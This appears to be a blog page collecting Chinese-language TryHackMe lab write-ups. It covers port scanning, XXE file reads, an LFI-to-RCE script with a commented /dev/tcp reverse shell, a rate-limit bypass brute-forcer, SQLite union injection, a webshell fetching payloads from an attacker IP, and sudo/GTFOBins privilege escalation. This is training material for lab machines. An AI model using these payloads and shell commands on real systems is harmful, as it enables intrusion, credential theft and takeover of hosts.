Try Hack Me on Steven Meow's Blog 🐱

Solar, exploiting log4j (Try Hack Me Writeup)

Sun, 19 Dec 2021 13:03:00 +0800

https://tryhackme.com/room/solar

2021 / 12 / 9 公開了 CVE-2021-44228，影響到了 log4j，它的危害程度達到 10，這個漏洞又被稱作 Log4Shell
現在已經有新版的 2.16.0 Release 了，不過又出現了 Log4j2

Recon

透過掃 Port 可以看到有開 3 個 Port，分別是22,111,8983

rustscan -a 10.10.18.186 -r 1-65535

可以用 nmap 做更詳細的掃瞄

nmap -sV -Pn -A -p22,111,8983 10.10.18.186

可以發現 8983 開的是一個 Apache solr 的 Server

Discovery

觀察首頁的版本可以知道他是 Solr 8.11.0

觀察 -Dsolr.log.dir 可以看到他的 log Path 是 /var/solr/logs

下載 lab 提供的 solrlogs.zip 檔案，他是一份範例的 Log 檔案

可以觀察到裡面有一個叫做 solr.log 的檔案會紀錄網頁的 Path 相關 Log

Battery (Try Hack Me Writeup)

Thu, 02 Sep 2021 23:51:00 +0800

URL :　https://tryhackme.com/room/battery

IP : 10.10.207.162

Recon

掃 Portrustscan -a 10.10.207.162 -r 1-65535
發現有開22
80nmap -A -p22,80 10.10.207.162-

Web

觀察首頁掃路徑-
/forms/admin.php- 發現 /forms 把 Header 拔掉就不會自動跳轉-
裡面傳送的資料是 XML ，可能可以 XXE但沒有登入都失敗

function XMLFunction(){
 var xml = '' +
 '' +
 '' +
 '' + $('#name').val() + '' +
 '' + $('#search').val() + '' +
 '';
 var xmlhttp = new XMLHttpRequest();
 xmlhttp.onreadystatechange = function () {
 if(xmlhttp.readyState == 4){
 console.log(xmlhttp.readyState);
 console.log(xmlhttp.responseText);
 document.getElementById('errorMessage').innerHTML = xmlhttp.responseText;
 }
 }
 xmlhttp.open("POST","forms.php",true);
 xmlhttp.send(xml);
};

在 register.php 註冊一組帳密meow
ABC
meow
註冊成功嘗試登入-
使用介面上的功能
發現不能使用再註冊一組- meow1
DEF
meow1掃目錄-
發現一個 /report載下來發現是一個 ELF-

Reverse

選單使用者- 字串比較- 更新-
這邊看到 admin@bank.a 滿可疑的

Web

嘗試註冊 admin@bank.a
被嘲諷ㄌQQ
但這代表應該確實跟這個有關!!用 Burp 後面加上 %00 截斷- 註冊成功- 後台亂輸入都會噴錯- 重新試著 XXE-

function XMLFunction(){
 var xml = '' +
 '\n' +
 ' ]>\n' +
 '' +
 '' + "0" + '' +
 '' + "&b;" + '' +
 '';
 var xmlhttp = new XMLHttpRequest();
 xmlhttp.onreadystatechange = function () {
 if(xmlhttp.readyState == 4){
 console.log(xmlhttp.readyState);
 console.log(xmlhttp.responseText);
 }
 }
 xmlhttp.open("POST","forms.php",true);
 xmlhttp.send(xml);
};
XMLFunction();

可以讀檔

cyber:x:1000:1000:cyber,,,:/home/cyber:/bin/bash
mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
yash:x:1002:1002:,,,:/home/yash:/bin/bash

看起來有興趣的使用者cyber
yash讀取原始碼- php://filter/convert.base64-encode/resource=/var/www/html/acc.php
找到註解上的密碼//MY CREDS :- cyber:super#secure&password!

SSH

順利連上取得 Base Flag-

提權

起手式 sudo -l
發現可以用 root 執行一個 run.py``run.py-
但我們沒有權限讀取他 QQ觀察原始碼- admin.php找到 mysql 的帳密Dump Mysql- mysqldump -u root -h 127.0.0.1 -p details > a.sql
看到一組密碼
I_know_my_password但好像就沒有什麼進展了 QQ跑 Linpeas-
發現 Linux Kernel 好像有點舊，可以用 Exploit
https://www.exploit-db.com/exploits/37292試著載下來編譯執行-
就成功 Root ㄌFlag2- Root Flag-

另外一種提權法

剛剛可以用 sudo 執行 run.py但是沒有權限可以讀取但因為這是我的家目錄，所以我可以改檔名、新增檔案- 所以自己創一個 run.py- import os
os.system("/bin/bash")再 sudo 它-
也可以順利提權

學到ㄌ

%00 截斷
XXE 記得加 ;

Windows Fundamentals 1 (Try Hack Me Writeup)

Tue, 24 Aug 2021 13:30:00 +0800

URL : https://tryhackme.com/room/windowsfundamentals1xbx

Task 1 Introduction to Windows

可以用 RDP 之類的方法進入 Windows預設帳號 : administrator
預設密碼 : letmein123!但我直接用 THM 提供的 web RDP 介面-

Task 2 Windows Editions

Home 版本跟 Pro 的差別可以使用 BitLocker
可以使用 WIP
https://www.microsoft.com/en-us/windows/compare-windows-10-home-vs-proWhat encryption can you enable on Pro that you can’t enable in Home?- A: BitLocker

Task 3 The Desktop (GUI)

Which selection will hide/disable the Search box?
HiddenWhich selection will hide/disable the Task View button?-
Show Task View buttonBesides Clock, Volume, and Network, what other icon is visible in the Notification Area?-
action center

Task 4 The File System

檔案系統FAT16 / FAT32File Allocation Table
USB 裝置之類ㄉ還是看ㄉ到HPFS- High Performance File SystemNTFS- New Technology File SystemNTFS 優勢- 文件紀錄系統，可以自動修復日誌
單檔案 >= 4G
可以針對資料夾跟黨按設定權限
資料夾跟檔案的壓縮
加密 (Encryption File System, EFS)NTFS 權限- Read對資料夾：可以觀看，跟顯示資料夾中的檔案與子資料夾
對檔案：可以觀看或存取檔案的內容Write- 對資料夾：可以在資料夾中增加檔案或子資料夾
對檔案：可以對檔案進行寫入Read & Execute- 對資料夾：可以觀看，顯示資料夾中的檔案與子資料夾；可以直行檔案，會繼承給檔案以及資料夾
對檔案：可以觀看、存取檔案的內容，也可以直行黨按List folder contents- 對資料夾：可以觀看，並列出檔案以及子資料夾，以及執行檔案，只能給資料夾繼承Modify- 對資料夾：可以讀取、寫入檔案以及子資料夾；允許刪除資料夾
對檔案：可以讀取，寫入檔案；允許刪除檔案Full Control- 對資料夾，允許讀取、寫入、變更以及刪除檔案與子資料夾
對檔案：允許讀取、寫入、變更予刪除檔案

Alternate Data Streams (ADS)

一種 NTFS 的 attribute
每一個檔案至少都會有一個 Data Stream ($DATA)
ADS 允許一個檔案包含多個 Data Stream
Windows Explorer 不會對使用者顯示 ADS，需要透過特定的第三方軟體或是 Powershell
所以有時候 Malware 會使用 ADS 來隱藏資料
延伸閱讀 https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
範例建立一個 ADS 的東東用 Dir 看不出來- 用 Type 也看不出來- 可以用 powershell GET-Item -path C:\Users\Administrator\Desktop\example -stream *- CMD 需要裝 Sysinternals 的 Streams- https://docs.microsoft.com/zh-tw/sysinternals/downloads/streamsWhat is the meaning of NTFS?- New Technology File System

Task 5 The Windows\System32 Folders

%windir%最常見的位子在 C:\Windows
裡面存放著作業系統，但他不一定需要在 C，也有一些喪心病狂的人會把他設定在其他地方
所以我們可以使用環境變數，或是說系統環境變數(System environment variables) 來正確的訪問System32- 資料夾中有許多對作業系統來說很重要的檔案
在變動、刪除時要特別小心，很可能讓系統爛掉What is the system variable for the Windows folder?- %windir%

Task 6 User Accounts, Profiles, and Permissions

兩種類型的帳戶Administrator增、刪使用者
修改 Group
修改作業系統設定Standard User- 修改與該使用者相關的資料夾、檔案的屬性
不能做系統層級的修改，例如安裝軟體使用者家目錄- C:\Users\{Username}
預設會有Desktop
Documents
Downloads
Music
PicturesLocal User and Group Management- lusrmgr.msc
可以看到各種使用者、群組的資訊What is the name of the other user account?- tryhackmebillyWhat groups is this user a member of?-
Remote Desktop Users,UsersWhat built-in account is for guest access to the computer?- GuestWhat is the account status?-
Account is disabled

Task 7 User Account Control

UACUser Account ControlVista 後開始使用的可以觀察到一個安裝檔案可能並沒有使用者相關的權限- 登入一個普通使用者- tryhackmebilly / window$Fun1!
10.10.229.121
會發現多出盾牌 icon如果執行安裝- 會需要輸入 Administrator 的密碼
What does UAC mean?- User Account Control

Task 8 Settings and the Control Panel

Win8 後出現 Settings 頁面舊版控制台 (Control Panel)- In the Control Panel, change the view to Small icons. What is the last setting in the Control Panel view?-
右上角選 small icons
最後一個選項是 Windows Defender Firewall

Task 9 Task Manager

What is the keyboard shortcut to open Task Manager?ctrl+shift+esc
哇酷，我還真不知道有這種東西呢

Task 10 Conclusion

喵喵

VulnNet (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:28:00 +0800

URL : https://tryhackme.com/room/vulnnet1
IP : 10.10.86.144

題目敘述You will have to add a machine IP with domain vulnnet.thm to your /etc/hosts

Recon

掃 Portrustscan -a 10.10.86.144 -r 1-65535nmap -A -p22,80 10.10.86.144- 掃目錄- python3 dirsearch.py -u http://10.10.86.144/
發現登入頁面-
戳了常見的 SQLi 都不行觀察網頁連結- 透過 js formatter 轉漂亮- broadcast.vulnnet.thm
加到 /etc/hosts前面的階段也可以用 LinkFinder- python3 linkfinder.py -i http://vulnnet.thm/python3 linkfinder.py -i http://vulnnet.thm/js/index__d8338055.js-
發現首頁可以帶一個 ?referer 參數訪問 broadcast.vulnnet.thm-
發現需要登入觀察首頁 referer 參數- 發現可以 LFI用 Session upload progress 大法

import grequests
sess_name = 'meowmeow'
sess_path = f'/var/lib/php/sessions/sess_{sess_name}'
base_url = 'http://vulnnet.thm/index.php'
param = "referer"

#code = "file_put_contents('/tmp/shell.php','& /dev/tcp/10.13.21.55/7877 0>&1'");'''

while True:
 req = [grequests.post(base_url,
 files={'f': "A"*0xffff},
 data={'PHP_SESSION_UPLOAD_PROGRESS': f"pwned:"},
 cookies={'PHPSESSID': sess_name}),
 grequests.get(f"{base_url}?{param}={sess_path}")]

 result = grequests.map(req)
 if "pwned" in result[1].text:
 print(result[1].text)
 break

然後就 RCE 了
(感覺就不是正規解…ㄏㄏ

提權

python3 -c 'import pty; pty.spawn("/bin/bash")'
掃豌豆
找到 backup觀察 backup 檔案，發現有 ssh-backup-
偷出來解壓縮-
發現是 id_rsa到家目錄看使用者名稱-
server-management發現是 server-management準備 ssh 登入-
發現 id_rsa 需要密碼 QQ用約翰爆破- python3 ../../ssh2john.py id_rsa > id_rsa_john
密碼是 oneTWO3gOyacSSH 登入-
取得 user flag跑豌豆掃到 .htpasswd 密碼的 hash- 猜測應該是給 broadcast.vulnnet.thm 用的
用約翰爆破個
密碼是 ``9972761drmfsls猜測原始思路正規解法應該是 LFI 到這個檔案訪問 broadcast.vulnnet.thm- 使用帳號 developers![](/uploads/2022/02/7cb34-jR4k1zC.png)密碼 9972761drmfsls`- 推測這應該是某個有 RCE 洞的 CMS
正規解是從這邊進 RCE ㄅ
隨便

二次提權

想起前面的 Backup 用了 tar *所以可以快速提權
接 Shell- 取 Root Flag-

Sustah (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:26:00 +0800

URL : https://tryhackme.com/room/sustah

IP : 10.10.252.122

Recon

掃 Portrustscan -a 10.10.252.122 -r 1-65535nmap -A -p22,80,8085 10.10.252.122-
gunicorn 20.0.4觀察首頁-
啥都ㄇ有
掃目錄
也沒東西觀察 8085 port-
看起來像是幸運轉盤
掃目錄
有一個 ping 他只會回 pong

爆數字

下面有一個猜數字遊戲
他說我有 0.004% 的勝率
先測一下能不能爆破

from bs4 import BeautifulSoup
import requests

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Content-Type': 'application/x-www-form-urlencoded',
 'Origin': 'http://10.10.252.122:8085',
 'Connection': 'keep-alive',
 'Referer': 'http://10.10.252.122:8085/home',
 'Upgrade-Insecure-Requests': '1',
}

data = {
 'number': '123'
}

for i in range(100):
 response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data)
 soup = BeautifulSoup(response.text,'html.parser')
 try:
 print(soup.find('h3').text)
 except:
 print(soup)

發現次數過多他會噴{"error":"rate limit execeeded"}
試了很多次發現- 帶 ‘X-Remote-Addr’ : ‘127.0.0.1’
就不會噴錯了計算一下- 1/(0.004%) = 25000
所以猜測密碼在這之間
寫腳本來爆一下

from bs4 import BeautifulSoup
import requests
from multiprocessing import Process, Pool

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Content-Type': 'application/x-www-form-urlencoded',
 'Origin': 'http://10.10.252.122:8085',
 'Connection': 'keep-alive',
 'Referer': 'http://10.10.252.122:8085/home',
 'Upgrade-Insecure-Requests': '1',
 'X-Remote-Addr' : '127.0.0.1'
}

l = [i for i in range(25000)]

def meow(num):
 data = {
 'number': num
 }

 response = requests.post('http://10.10.252.122:8085/home', headers=headers, data=data)
 soup = BeautifulSoup(response.text,'html.parser')
 try:
 s = soup.find('h3').text
 if 'Oh no!' not in s:
 print(num,s)
 except:
 print(soup , response.status_code)
p = Pool(200)
p.map(meow,l)

幾秒鐘就爆出來ㄌ
10921他回應我這個 /YouGotTh3P@th/- 加到 80 port 的 Path 上面會出現一個 CMS-

CMS

發現他是 Mara CMS
預設可以用 admin / changeme 進行登入登入完還要我趕快改密碼- 查詢相關 Exploit- https://www.exploit-db.com/exploits/48780
目測是可以直接傳 webshell那就給他直接傳下去ㄅ- 還真的可以- http://10.10.252.122/YouGotTh3P@th/img/webshell.php?A=wget 10.13.21.55:8000/s -O /tmp/s戳 reverse shell

提權

python3 -c "import pty;pty.spawn('/bin/bash')"
試著用 LSEbash lse.sh -l1
看不出什麼東西 QQ發現 find 指令被封鎖 QWQ- 提示說去找備份檔案
網路上看到兩種解法tar cf - $PWD 2>/dev/null | tar tvf - | grep backup慢du -a 2>/dev/null | grep backup- 快就找到了 /usr/backups- 觀察發現有一個隱藏檔 .bak.passwd-
解開來看獲得帳號密碼- kiran / trythispasswordforuserkiran透過 su 切過去- 取得 User Flag-

二次提權

起手式 sudo -l使用豌豆-
發現有一個 doas 酷指令，可以不用 suid 或 sudo去 GTFOBins 尋找 rsync to shell- https://gtfobins.github.io/gtfobins/rsync/#suid
doas rsync -e 'sh -p -c "sh 0&2"' 127.0.0.1:/dev/null
成功提權取得 Root Flag-

Madeye Castle (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:06:00 +0800

URL : https://tryhackme.com/room/madeyescastle

IP : 10.10.150.136

Recon

掃 Portrustscan -a 10.10.150.136 -r 1-65535Open 10.10.150.136:22
Open 10.10.150.136:80
Open 10.10.150.136:139
Open 10.10.150.136:445nmap -A -p22,80,139,445 10.10.150.136- 掃路徑- python3 dirsearch.py -u http://10.10.150.136backup/觀察首頁-
比起 Apache Default Page 好像多了一個 Logo
但是他死ㄌ嘗試 smb- smbclient -N '//10.10.150.136/sambashare'
匿名登入- 下載檔案- 觀察檔案
感覺很像某種字典檔- 另外一個檔案
感覺有某些提示， Hagrid 可能用 rockyou 的密碼嘗試 Hydra 爆密碼- hydra -L user.txt -P spellnames.txt hogwartz-castle.thm http-post-form "/login:user=^USER^&password=^PASS^:Incorrect Username or Password"
感覺很慢，沒效率，先放著丟一邊觀察首頁的註解-
看起來可以改 /etc/hosts用 domain name 來訪問首頁-
看起來是可以輸入帳號密碼的頁面掃路徑-
看起來沒啥東西

SQLi

嘗試 SQLi亂輸入會噴 500 錯誤先複製 curl- curl 'http://hogwartz-castle.thm/login' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://hogwartz-castle.thm' -H 'Connection: keep-alive' -H 'Referer: http://hogwartz-castle.thm/' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'user=aa&password=bb'可以戳 Union- 'union select 1,2,3,4 --
測了一些 version 之類的東東都發現不行- 才發現他是 SQLite
‘union select sqlite_version(),2,3,4 –
SQLite 爆表- 'union select name,2,3,4 from sqlite_master WHERE type='table' --
發現只有一張 users 的 table爆 Column- 'union select sql,2,3,4 from sqlite_master WHERE type='table' --
name
password
admin
notes選使用者- 'union select group_concat(name),2,3,4 from users --
選 admin- 爆使用者跟密碼組-

import requests

headers = {
 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
 'Accept-Language': 'en-US,en;q=0.5',
 'Content-Type': 'application/x-www-form-urlencoded',
 'Origin': 'http://hogwartz-castle.thm',
 'Connection': 'keep-alive',
 'Referer': 'http://hogwartz-castle.thm/login',
 'Upgrade-Insecure-Requests': '1',
}

# 'union select 1,2,3,4 --

for i in range(1,40):
 data = {
 'user': f"'union select name || ':' || password,2,3,4 from users limit {i},1 --",
 'password': '123'
 }

 response = requests.post('http://hogwartz-castle.thm/login', headers=headers, data=data)

 name = response.text[27:-19]

 print(name)

取的所有的 hash分析 hash 格式-
SHA 512用哈希貓-
hashcat -m 1700 hashes.txt spellnames.txt
hashcat -m 1700 hashes.txt /opt/rockyou.txt
發現基本上都爆不出來觀察 notes- 'union select group_concat(notes),2,3,4 from users --
發現密碼用ㄌ best64查詢哈希貓 best64 的用法- https://github.com/hashcat/hashcat/blob/master/rules/best64.rule
hashcat -m 1700 hashes.txt /opt/rockyou.txt -r best64.rule
成功爆出來密碼b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885:wingardiumleviosa123回來用 SQLi 找使用者看看- 'user': "'union select name,2,3,4 from users where password like 'b326e7a6%' --
Harry Turner觀察他的 notes- "'union select notes,2,3,4 from users where password like 'b326e7a6%' --
使用 first name

SSH

ssh harry@hogwartz-castle.thm密碼： wingardiumleviosa123
登入成功

提權

sudo -l
發現一個叫做 pico 的程式
可以用 hermonine 執行 pico執行看看-
發現打開是 nano尋找利用方式- https://gtfobins.github.io/gtfobins/nano/#sudo
sudo -u hermonine /usr/bin/pico
^R^X
reset; sh 1>&0 2>&0
成功橫向移動成功取得 User Flag-

二次提權

發現使用者根目錄有 .python_history
看起來是有用過 pwntools 的遺跡python -c 'import pty; pty.spawn("/bin/bash")'- 增加互動性跑豌豆-
找到一個奇妙的，有 suid 的檔案/srv/time-turner/swagger直接執行-
看起來是猜數字遊戲丟進 ida-
看起來是用 timestamp 當 random seed
我們可以自己編譯一個程式，餵入當前時間date +%s ; /srv/time-turner/swagger- 可以取得當前 timestamp ，並執行程式編譯自己的 C 語言程式，給予指定的 timestamp- 填上去！-
成功，發現他會呼叫沒有絕對路徑的 uname所以可以蓋 path-
/bin/date +%s ;PATH=/home/hermonine/fakepath:$PATH /srv/time-turner/swagger
就成功 root 了取得 Root Flag-
RME{M@rK-3veRy-hOur-0135d3f8ab9fd5bf}

Looking Glass (Try Hack Me Writeup)

Mon, 23 Aug 2021 13:05:00 +0800

URL : https://tryhackme.com/room/lookingglass

IP : 10.10.150.136

Recon

掃 portrustscan -a 10.10.150.136 -r 1-65535
三小 ?_?
先看看比較特別的 22 port
也沒啥特別ㄉrustscan -a 10.10.150.136 -r 1-65535 --accessible | tee rustscan.txt- 存成檔案用 curl 觀察-
用 nmap 觀察- nmap -sV -p9001,9011,9003,9000,9009,9006,9005,9004,9015,9008,9007,9013,9017,9002,9010,9012,9020,9014,9019,9016,9024,9018,9027,9026,9034,9025,9023,9021,9022,9033,9035,9039,9030,9029,9051,9031,9045,9040,9052,9028,9042,9038,9041,9032,9048,9044,9043,9037,9049,9036,9059,9047,9050,9058,9057,9054,9053,9061,9056,9046,9064,9055,9062,9071,9060,9063,9068,9067,9066,9065,9075,9074,9073,9072,9070,9069,9081,9076,9080,9082,9078,9079,9091,9089,9077,9085,9101,9088,9086,9083,9100,9084,9095,9099,9093,9087,9090,9094,9096,9092,9097,9098,9103,9105,9104,9102,9107,9106,9109,9114,9110,9108,9115,9111,9113,9112,9117,9121,9116,9119,9120,9118,9122,9123,9127,9126,9131,9125,9130,9129,9124,9128,9132,9133,9135,9134,9137,9136,9138,9143,9140,9141,9142,9158,9155,9154,9147,9149,9145,9139,9161,9167,9156,9148,9168,9150,9146,9164,9166,9165,9177,9157,9152,9144,9162,9151,9174,9153,9172,9159,9178,9173,9171,9179,9160,9180,9163,9169,9184,9189,9193,9186,9170,9195,9176,9185,9175,9181,9182,9204,9192,9183,9190,9191,9202,9194,9197,9200,9206,9196,9209,9208,9188,9187,9215,9203,9198,9199,9205,9201,9213,9217,9216,9210,9214,9212,9211,9219,9218,9207,9220,9221,9222,9223,9225,9224,9228,9226,9227,9231,9229,9230,9232,9233,9234,9235,9236,9238,9237,9247,9240,9241,9248,9250,9253,9243,9239,9245,9242,9252,9251,9254,9246,9244,9249,9255,9258,9259,9256,9257,9267,9260,9262,9264,9263,9266,9261,9265,9268,9270,9273,9274,9271,9269,9276,9275,9272,9277,9283,9278,9285,9279,9284,9281,9280,9282,9286,9287,9289,9288,9290,9291,9293,9292,9294,9295,9297,9299,9296,9301,9303,9298,9300,9302,9304,9305,9306,9307,9308,9309,9310,9311,9316,9312,9314,9317,9313,9315,9318,9320,9321,9322,9324,9325,9323,9319,9329,9326,9331,9330,9328,9332,9327,9333,9334,9335,9337,9340,9338,9343,9344,9336,9342,9339,9345,9346,9341,9348,9350,9352,9347,9351,9349,9353,9356,9355,9358,9360,9354,9357,9364,9362,9359,9363,9367,9361,9365,9366,9375,9373,9369,9374,9368,9381,9380,9384,9371,9376,9377,9370,9372,9378,9382,9379,9385,9383,9389,9387,9388,9390,9393,9392,9386,9391,9394,9395,9396,9397,9398,9399,9400,9401,9412,9410,9408,9419,9417,9424,9402,9406,9420,9407,9415,9413,9414,9425,9405,9416,9418,9404,9411,9403,9409,9426,9421,9423,9427,9429,9422,9428,9430,9431,9432,9433,9434,9435,9442,9440,9437,9439,9441,9438,9436,9446,9450,9444,9443,9445,9447,9449,9448,9451,9454,9452,9453,9458,9455,9459,9456,9457,9463,9460,9461,9465,9462,9468,9464,9466,9467,9470,9469,9474,9473,9472,9477,9478,9471,9482,9476,9475,9480,9483,9479,9481,9485,9486,9484,9491,9487,9488,9489,9490,9493,9492,9494,9498,9499,9497,9496,9495,9502,9501,9500,9503,9505,9504,9508,9510,9507,9506,9509,9511,9512,9513,9514,9517,9519,9515,9516,9520,9518,9522,9527,9526,9528,9521,9525,9524,9530,9533,9523,9529,9534,9532,9531,9535,9536,9537,9539,9538,9540,9541,9545,9543,9542,9544,9546,9551,9549,9547,9554,9548,9555,9556,9557,9550,9558,9552,9553,9559,9561,9560,9562,9564,9565,9563,9568,9566,9569,9571,9567,9573,9574,9572,9575,9570,9576,9580,9577,9581,9579,9578,9582,9583,9584,9586,9585,9587,9589,9594,9588,9590,9592,9591,9593,9595,9601,9598,9600,9602,9599,9597,9596,9603,9609,9608,9607,9606,9610,9604,9615,9612,9619,9617,9605,9613,9621,9614,9611,9616,9620,9622,9618,9623,9644,9626,9627,9638,9633,9640,9629,9630,9624,9642,9634,9637,9636,9643,9632,9635,9625,9641,9647,9645,9639,9628,9631,9646,9648,9649,9650,9651,9653,9654,9652,9659,9657,9655,9658,9656,9660,9661,9663,9662,9664,9665,9666,9668,9667,9671,9669,9670,9672,9673,9675,9674,9676,9678,9677,9679,9680,9681,9682,9683,9684,9685,9686,9692,9689,9687,9693,9690,9688,9691,9694,9695,9698,9696,9699,9697,9700,9724,9725,9722,9737,9726,9723,9728,9721,9738,9727,9739,9736,9735,9740,9741,9742,9745,9744,9743,9747,9748,9750,9746,9752,9749,9754,9753,9751,9762,9763,9764,9766,9770,9767,9765,9771,9773,9772,9780,9777,9781,9779,9778,9790,9789,9801,9802,9791,9799,9804,9811,9803,9800,9806,9805,9808,9814,9815,9809,9807,9810,9813,9816,9817,9812,9818,9821,9819,9820,9824,9828,9822,9826,9823,9829,9825,9827,9830,9831,9832,9833,9837,9834,9836,9839,9841,9835,9838,9848,9840,9842,9846,9847,9844,9851,9849,9845,9850,9843,9853,9852,9865,9857,9855,9859,9862,9854,9856,9863,9861,9866,9860,9858,9868,9864,9867,9870,9869,9872,9871,9878,9874,9875,9879,9873,9877,9876,9880,9884,9886,9882,9881,9888,9889,9883,9887,9885,9893,9892,9891,9890,9896,9900,9904,9898,9895,9899,9894,9901,9910,9907,9906,9905,9897,9908,9903,9902,9913,9909,9912,9911,9915,9926,9914,9924,9917,9923,9920,9919,9925,9922,9921,9918,9916,9930,9928,9927,9929,9934,9941,9937,9939,9931,9933,9936,9935,9940,9938,9932,9942,9943,9944,9961,9972,9966,9962,9971,9964,9967,9969,9963,9968,9970,9965,9975,9973,9974,9978,9979,9977,9980,9976,9981,9996,9983,9982,10000,9984,9986,9985,9997,10001,9998,9999,10002,10003,10006,10005,10004,10007,10011,10017,10015,10012,10008,10009,10013,10014,10010,10016,10018,10020,10019,10021,10022,10024,10023,10027,10025,10028,10026,10034,10032,10030,10029,10035,10031,10033,10037,10036,10039,10038,10042,10041,10044,10040,10045,10043,10046,10047,10049,10048,10050,10052,10051,10056,10053,10054,10055,10057,10058,10060,10059,10064,10065,10067,10062,10070,10071,10066,10061,10063,10069,10073,10072,10068,10074,10075,10078,10077,10076,10079,10080,10083,10081,10084,10082,10086,10087,10085,10088,10090,10092,10089,10091,10095,10093,10098,10094,10096,10097,10099,10101,10100,10102,10103,10105,10104,10106,10107,10110,10111,10112,10108,10114,10109,10113,10116,10115,10117,10119,10118,10120,10121,10122,10124,10123,10126,10128,10125,10132,10129,10135,10127,10131,10130,10133,10134,10138,10137,10139,10141,10140,10142,10136,10143,10149,10145,10150,10146,10153,10148,10151,10147,10144,10152,10154,10155,10156,10162,10158,10161,10160,10159,10157,10174,10172,10179,10173,10178,10180,10181,10182,10185,10183,10184,10188,10187,10186,10189,10190,10191,10193,10192,10195,10194,10196,10198,10199,10197,10202,10200,10201,10205,10207,10203,10204,10212,10211,10208,10206,10210,10209,10214,10213,10215,10217,10216,10223,10218,10221,10219,10220,10222,10224,10226,10225,10229,10227,10231,10228,10230,10239,10240,10238,10242,10241,10243,10244,10245,10246,10248,10249,10247,10251,10250,10255,10252,10261,10253,10254,10256,10257,10262,10259,10260,10263,10258,10265,10264,10266,10267,10268,10269,10270,10271,10272,10275,10273,10278,10274,10279,10292,10277,10276,10293,10294,10295,10297,10299,10296,10298,10301,10300,10345,10344,10347,10346,10343,10348,10350,10352,10349,10351,10353,10354,10355,10374,10378,10379,10377,10375,10376,10381,10383,10380,10382,10436,10384,10438,10437,10440,10439,10441,10442,10446,10447,10449,10445,10444,10450,10452,10453,10448,10455,10456,10454,10463,10462,10460,10464,10465,10461,10459,10477,10466,10476,10475,10478,10480,10479,10484,10487,10486,10485,10488,10491,10489,10493,10490,10492,10494,10496,10495,10497,10499,10502,10500,10498,10503,10501,10506,10504,10507,10508,10505,10513,10511,10510,10514,10518,10509,10512,10515,10516,10521,10517,10522,10523,10520,10526,10519,10524,10530,10528,10525,10527,10529,10531,10533,10532,10536,10540,10534,10535,10538,10539,10541,10542,10537,10544,10545,10546,10548,10543,10547,10551,10550,10552,10549,10557,10554,10556,10559,10558,10560,10561,10553,10555,10563,10562,10564,10565,10567,10569,10566,10568,10570,10571,10576,10573,10577,10575,10572,10578,10574,10579,10581,10580,10582,10584,10583,10585,10590,10593,10588,10586,10595,10587,10589,10592,10591,10600,10603,10596,10594,10601,10597,10598,10599,10604,10605,10602,10607,10606,10608,10611,10610,10609,10615,10613,10612,10614,10616,10618,10617,10620,10619,10621,10624,10625,10622,10623,10626,10630,10632,10628,10634,10627,10631,10635,10629,10633,10636,10637,10638,10639,10640,10644,10646,10642,10649,10643,10641,10645,10647,10648,10650,10651,10653,10652,10654,10655,10657,10656,10658,10661,10660,10659,10662,10664,10663,10666,10665,10668,10667,10670,10669,10671,10672,10673,10674,10675,10676,10678,10677,10679,10680,10681,10683,10684,10682,10685,10687,10686,10688,10689,10690,10691,10692,10693,10694,10698,10699,10696,10697,10695,10700,10701,10703,10704,10705,10702,10706,10707,10708,10709,10712,10710,10711,10714,10713,10715,10717,10718,10716,10719,10720,10721,10722,10723,10724,10726,10725,10727,10728,10729,10733,10736,10734,10731,10730,10737,10732,10735,10738,10739,10740,10741,10742,10746,10747,10744,10743,10745,10749,10748,10751,10750,10752,10754,10753,10755,10756,10757,10758,10762,10760,10759,10761,10763,10768,10764,10765,10766,10771,10770,10767,10769,10772,10773,10774,10775,10776,10777,10780,10779,10778,10785,10788,10786,10784,10782,10787,10783,10781,10792,10789,10790,10791,10793,10794,10795,10796,10797,10798,10799,10801,10800,10803,10802,9733,9757,9761,9758,9734,9760,9715,9759,9717,9720,10804,9716,9731,9719,9732,9755,9712,9708,9769,9718,9756,9768,9713,9730,10805,9714,9729,9710,9711,9709,9706,9702,9705,9703,9707,10806,9701,9704,10807,10809,10812,10808,10810,10813,10811,10815,10814,10816,10817,10823,10820,10819,10821,10822,10818,10827,10826,10825,10824,10828,10834,10831,10829,10833,10836,10832,10830,10837,10835,10838,10842,10841,10840,10843,10839,10857,10844,10858,10855,10861,10860,9776,10856,9774,9775,9782,9798,9788,9784,9783,9786,9795,9787,9785,10863,10862,9796,10864,9792,9794,9797,9793,10865,10866,10878,10888,10883,10880,10887,10882,10879,10889,10885,10881,10884,10886,10891,10890,10893,10894,10892,10895,10903,10901,10902,10904,10896,10905,10919,10918,10920,10921,10922,10923,10925,10926,10924,10930,10927,10929,10928,10931,10932,10933,10934,10935,10937,10936,10938,10939,10940,10941,10942,10943,10944,10945,10948,10947,10946,10949,10950,10952,10951,10955,10954,10953,10956,10959,10958,10957,10961,10960,9956,9951,9959,9957,9945,9955,9954,9948,9953,9947,10962,9960,9958,9949,9952,10967,10965,9946,10970,10968,10966,9950,10964,10963,10969,10971,10972,10973,10975,10976,10980,10974,10982,10977,10978,10979,10981